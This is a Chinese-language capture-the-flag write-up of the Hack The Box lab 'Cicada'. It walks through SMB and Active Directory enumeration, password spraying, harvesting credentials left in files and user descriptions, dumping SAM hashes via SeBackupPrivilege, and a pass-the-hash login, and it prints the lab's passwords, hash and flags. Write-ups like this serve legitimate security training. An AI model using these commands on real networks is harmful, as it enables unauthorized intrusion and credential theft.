HTB Cicada
Cicada
先nmap
# nmap -sT -p- --min-rate 10000 -o ports 10.129.254.230
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-06 05:09 CST
Nmap scan report for 10.129.254.230
Host is up (0.0020s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
53606/tcp open unknown发现开启了smb
What is the name of the non-default SMB share that is readable with guest access on Cicada?
探测一下
# nxc smb 10.129.254.230
SMB 10.129.254.230 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)添加host
echo "10.129.254.230 cicada.htb" | sudo tee -a /etc/hostssmb空密码连接
# smbclient -L 10.129.254.230
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
DEV Disk
HR Disk 注意到HR
What is the name of the file found in the HR share?
连接
#smbclient '\\10.129.254.230\HR'
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 07:29:09 2024
.. D 0 Thu Mar 14 07:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 12:31:48 2024Which user has left their password in Active Directory metadata?
读取文件,注意到
Your default password is: Cicada$M6Corpb*@Lp#nZp!8枚举用户名(这里随便一个用户名,密码为空即可)
nxc smb 10.129.254.230 -u 1 -p '' --rid-brute 然后过滤一下
# nxc smb 10.129.254.230 -u 1 -p '' --rid-brute | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > users.txt
# cat users.txt
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars爆破
# nxc smb 10.129.254.230 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
<...>
STATUS_LOGON_FAILURE
SMB 10.129.254.230 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8查看共享权限
# nxc smb 10.129.254.230 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
<...>
SMB 10.129.254.230 445 CICADA-DC DEV 很可惜不能读取
利用已知账户,枚举其他账户信息
# nxc smb 10.129.254.230 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB 10.129.254.230 445 CICADA-DC david.orelious 2024-03-14 12:17:29 1 Just in case I forget my password is aRt$Lp#7t*VQ!3发现david.orelious的账户密码
What is the name of the PowerShell script located in the DEV share?
使用新的账户查看smb共享权限
#nxc smb 10.129.254.230 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
<...>
SMB 10.129.254.230 445 CICADA-DC DEV READ 有读取权限,使用smbclient连接并下载文件
# smbclient '\\10.129.254.230\DEV' -U david.orelious --password='aRt$Lp#7t*VQ!3'
smb: \> ls
. D 0 Thu Mar 14 07:31:39 2024
.. D 0 Thu Mar 14 07:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 12:28:22 2024
smb: \> get Backup_script.ps1What is the emily.oscars user's password?
文件内硬编码了账号密码
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -ForceSubmit the flag located in the emily.oscars user's home directory.
用账号密码登录即可
#evil-winrm -i 10.129.254.230 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/6/2026 10:05 AM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
8215ed609febb7466738009d0a877d35What dangerous privilege does the emily.oscar user have associated with their account?
查看特权
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled看到有SeBackupPrivilege权限
转储sam和system并下载
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> reg save hklm\sam sam
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> reg save hklm\system sys
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> download sam
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> download sys然后解密出hash
#impacket-secretsdump -sam sam -system sys local
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up... Submit the flag located on the Administrator user's Desktop.
登录拿flag即可
#evil-winrm -i 10.129.254.230 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/6/2026 10:05 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
d4275811a1ac43f27c79d1d6aa228693总结
学习了smb信息枚举,利用SeBackupPrivilege权限转储hash并进行hash传递攻击的流程
许可协议:
CC BY 4.0